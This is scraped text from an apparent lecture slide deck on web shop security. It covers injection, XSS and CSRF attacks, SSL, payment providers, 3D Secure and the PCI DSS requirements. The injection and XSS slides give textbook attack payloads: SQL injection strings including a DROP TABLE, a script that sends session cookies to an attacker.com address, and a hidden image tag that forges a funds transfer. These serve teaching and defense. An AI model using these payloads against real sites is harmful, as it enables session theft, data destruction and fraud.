8 VULNERABILITIES IN E-COMMERCE INTRODUCTION Web shop SecurityVULNERABILITIES IN E-COMMERCE INTRODUCTIONe-Commerce grows exponentially. Principally B2B and B2C.INTERNET must provides the communication at the right time in the right way.As the benefits of a enterprise increase in order to the services that it offers better and faster than their competitors, in the same line:Information is MORE SENSITIVE and MORE DANGEROUS in the wrong people ”Customer information is like gold to marketers”.INTERNET SERVICES are growing exponentially too:more COMPLEX software==more PROBLEMS DEVELOPING software.+More FAST DEVELOPING==more POOR SECURITY implementation.LACK of KNOWLEDGE concerning TO SECURE the customer’s personal information.=WEAKNESSES IN SECURING INFORMATION ARE INCREASING"Your system is only as secure as the people who use it“
9 VULNERABILITIES IN E-COMMERCE THE GENERAL CONTEXT Web shop SecurityVULNERABILITIES IN E-COMMERCE THE GENERAL CONTEXTThe software environment in web applications are NOT implemented relying on a SECURITY DESIGNProgrammers are not well formed in securing programming techniquesWeak mechanisms that ensure sanitized inputs and outputs (e.g. improper input validation and improper escaping and structured output)Designers don’t specify an independent and restricted environment for the applicationUndefined policies for restricting the software environment:Run privileges total control of the sw environmentError messages disclosure software architecture and implementationVirtualization Attacks impact more spread into the sw environmnetRelying on Security through ObscuritySoftware protections mechanisms relying on secrecy == reversing engineering exploitableTrustworthiness in third parties softwareMaintainers and managers don’t asses and implement security in the all software lifecycleMisuse of the automated/static and manual/dynamic analysis (e.g fuzzers, scanners, pen testing)RESULT: "You can’t effectively and consistently manage what you can’t measure, and you can’t measure what you haven’t defined…“ SOFTWARE WEAKNESSES
10 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION”INJECTION attacks happen when untrusted data is sent to an interpreter as a part of a command or queryThe attacker’s modified data can mislead the interpreter (in the back-end database)executing unintended command oraccessing to unauthorized dataTwo Front-end application Injection’s attacks:Incorrect filtered escape charactersIncorrect type handlingOne back-end application Injection’s attack:Blind Injection
11 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION EXAMPLES”Incorrectly filtered escape charactersThe next statement is crafted by the attacker for evaluates always like true:SELECT * FROM users WHERE name = ‘ ‘ OR ‘1’ = ‘1’In this statement the attacker can force selecting a valid user name, broken the authentication procedureIncorrect type handlingThe input field is not type constrained (strongly typed), so the attacker can craft the next query:SELECT * FROM userinfo WHERE id = “+ type_not_constrained_input_value + “ ; “Crafting this statement introducing: 1;DROP TABLE `users`SELECT * FROM userinfo WHERE id = 1;DROP TABLE `users`;In this statement the attacker delete the user’s table in the database, so the integrity of the data has been compromised.
12 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION EXAMPLES”Blind injectionThe attacker introduces conditional queries in order to reveal information that is not disclose at first, through error messages database responses finding any possible Injections attacks attempts:A typical attempt:The attacker have this information:SELECT title, description, body FROM items WHERE ID = 2He/She sends the next query to the database:and 1=2SELECT title, description, body FROM items WHERE ID = 2 AND 1=2If the attacker receives a different page from the database, he/she knows that the database is vulnerable to Injection.
13 "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Web shop SecurityVULNERABILITIES IN THE E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION” (OWASP TOP TEN 2010)Account SummaryAcct:Acct:Acct:Acct:Account:SKU:Account:SKU:"SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’"HTTP response DB Table HTTP requestSQL queryAccountsFinanceAdministrationTransactionsCommunicationKnowledge MgmtE-CommerceBus. FunctionsApplication LayerDatabasesLegacy SystemsWeb ServicesDirectoriesHuman ResrcsBillingAPPLICATION ATTACK1. Application presents a form to the attackerCustom Code2. Attacker sends an attack in the form dataApp Server3. Application forwards attack to the database in a SQL queryWeb ServerHardened OS4. Database runs query containing attack and sends encrypted results back to applicationNetwork LayerFirewallFirewall5. Application decrypts data as normal and sends results to the user
14 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “XSS”XSS (Cross Site Scripting) attacks occur when webapps and attackers takes unsanitized data and they send to a user’s web browser.Attackers and the webapp can execute scripts in the user’s browsers for obtain:Session cookies.Redirect the user another malicious sites.Bypass the control access mechanisms (like same origin policy).There are 3 principal variants:Non persistent attackPersistent attackDOM oriented attackThis vulnerability rely on the user’s browser trustworthiness put on the webapp
15 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “XSS NON-PERSISTENT”Non-persistent attack requires that the user visit any crafted link or any object containing malicious codeExample: “This attack perform a theft of user’s authorization when the user is required to introduce the credit card number, in order to obtain access to a Web server stealing the user’s session ID"1. The attacker catch the server’s not validate response of the request sent by the user:(String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>";The attacker introduce the embebed code in order to redirect the user’s session ID to an untrusted web site. He/She uses the “CC” field:'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>‘3. The attacker receives the user’s session ID in the malicious place and can impersonate the “user’s browser”.
‘ 3. The attacker receives the user’s session ID in the malicious place and can impersonate the user’s browser .",
A DOM-oriented attack can instigate the user’s browser to execute. pieces of modified DOM controled by the attacker. In this case, the embebed malicious code can steal the user’s session cookie by forcing the user to click: http://www.vulnerable.site/welcome.html name= ",
17 Web shop SecurityVULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “CSRF”CSRF (Cross Site Request Forgery) attacks exploit the webapp’s trustworthiness putting in the user’s browsersThese attacks force an authenticated user on a web site to send requests to a server without any knowledge by the userWeb servers often are designed to receive “trusted” requests fromtrusted users without any control mechanisms to verify if they are intended requests:The attacker can trick the web site making unintended requests by the user and being treated like “trusted requests”CSRF together with XSS is a bigger threat because XSS can be used like the base for CSRF’s attack operating under the “same-origin policy “(2 trusted places=same domain and same protocol)
18 VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “CSRF’S ATTACK EXAMPLE” EXAMPLE: “A user is browsing in a vulnerable web site. He/she needs to transfer money for buy a product. The user is authenticated. How can an attacker compromise the user’s money with a CSRF attack?”1. The user does a request in the web site, and the request’s content is clear text:2. The attacker control the traffic and can store information in the web site. He/She receives the request. He construct a new request transfering money from the user’s account to the attacker’s account and embebe this code into a “image tag request” and stored in the vulnerable web site:<imgsrc="http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#“width="0" height="0" />3. If the user stored the cookie with session info, browsing in the web site while the user is authenticated and “viewing” the image the forged request embebed will allow from the user’s browser the “authorized” hidden request
19 VULNERABILITIES IN E-COMMERCE SOME STATISTICS (FROM 2008) web applications with detected vulnerabilities
20 Social EngineeringTargetsTekniqueConsequencePrevention
21 Policy Making Purpose Statement Applicability and Scope statement Effective dateResponsibilitiesPolicy StatementBackgroundDefinitions
22 Physical Security Lockup the Server rooms Set up surveillance Make sure vulnerable devices are locked upUse rack mount serversDon’t forget about the workstationsKeep intuders out of the computer/server case
23 Physical Security Protect portable devices Take backups and keep them secureDisable the drivesProtect your printers
24 SSL Secure Sockets Layer Enables secure data exchange between client and serverProtocol below the Application layerConfidentiality (Encryption)Integrity (MAC)
25 SSL Services Fragmentation Devides data into blocks of 2^14 bytes Compression Data can be compressed, optionalMessage Integrity Keyed hash function with MACConfidentiality Symmetric key cryptographyFraming
26 Handshake No handshake, no security Enables exchange of keys Reduces the risk of Man in the middle attacksSetting upp parametersAbout 10 steps in the handshakeWhat cipher suites, SSL versions are supportedClient gets the servers public key from the server certificateClient creates pre master secret, sends it encrypted to the serverPre master secret creates a master secretMaster secret is then used to create session keys and auth keys
27 MAC Message Authentication Code A hash using the message and authentication keyUsed to authenticate the sender of a message(Message+Authkey) = Hash
28 Putting it all together Exchange of information using SSL
29 SSL Weaknesses Cipher suites can be weak Man in the middle Keyjacking Fake certificates
30 PSP: Payment Service Provider Web shop SecurityPSP: Payment Service ProviderDEFINITION OF PSP“PSPs offers merchants online services for accepting electronic payments by a variety of payment methods including credit card, bank-based payments such as direct debit, bank transfer, and real-time bank transfer based on online banking.”Solution for problems in connecting e-market with banks2 different fee policiesSecurity
32 3D SECURE DEFINITION OF 3D SECURE Security ”3D Secure is an XML-Based protocol used as an added layer of security for online credit and debit card transactions.”SecurityThree domain model for authentication:Acquirer DomainIssuer DomainInteroperability DomainBased on SET
33 PCI DSS Payment Card Industry Data Security Standard Security standard to control credit card infoDefined by the PCI SSCUnified from:Visa Card Information SecurityMasterCard Site Data ProtectionAmerican Express Data Security Operating PolicyDiscover Information and ComplianceJBC Data security ProgramObjectivesProtected and Unprotected DataSecurity techniques
34 PCI DSS Requirements Build and maintain a Secure Network 1. Install and maintain a firewall configuration to protect cardholder data.2. Do not use vendor-supplied defaults for system passwords and other security parameters.Protect cardholder Data3. Protect stored cardholder data.4. Encrypt transmissions of cardholder data across open, public networks.Maintain a vulnerability management program5. Use and regularly update anti-virus software on all systems commonly affected by malware.6. Develop and maintain secure systems and applications.Implement strong access control measures7. Restrict access to cardholder data by business need-to-know.8. Assign a unique ID to each person with computer access.9. Restrict physical access to cardholder data.Regularly monitor and test networks10. Track and monitor all access to network resources and cardholder data.11. Regularly test security systems and processes.Maintain an information security policy12. Maintain a policy that addresses information security.